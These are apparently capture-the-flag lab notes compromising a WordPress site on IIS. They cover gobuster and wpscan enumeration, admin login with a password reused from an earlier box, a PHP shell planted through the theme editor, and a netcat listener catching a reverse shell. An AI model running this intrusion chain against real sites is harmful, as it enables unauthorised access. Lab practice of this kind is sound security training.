2 :80
$ gobuster dir -u 10.10.10.29 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,conf
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.29
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,txt,conf
[+] Timeout: 10s
===============================================================
2021/04/24 20:46:47 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 152] [--> http://10.10.10.29/wordpress/]
$ wpscan --url 10.10.10.29/wordpress -e u
[+] Headers
| Interesting Entries:
| - Server: Microsoft-IIS/10.0
| - X-Powered-By: PHP/7.1.29
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
[i] Plugin(s) Identified:
[+] mesmerize-companion
| Location: http://10.10.10.29/wordpress/wp-content/plugins/mesmerize-companion/
| Latest Version: 1.6.122
| Last Updated: 2021-04-08T08:54:00.000Z
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
Using password from last box (Vaccine)
admin: P@s5w0rd!
Using Theme Editor and modifying theme to shell.php
http://10.10.10.29/wordpress/wp-content/themes/twentynineteen/404.php
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.10.29] 53206
SOCKET: Shell has connected! PID: 3752
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
whoami
iis apppool\wordpress
Last updated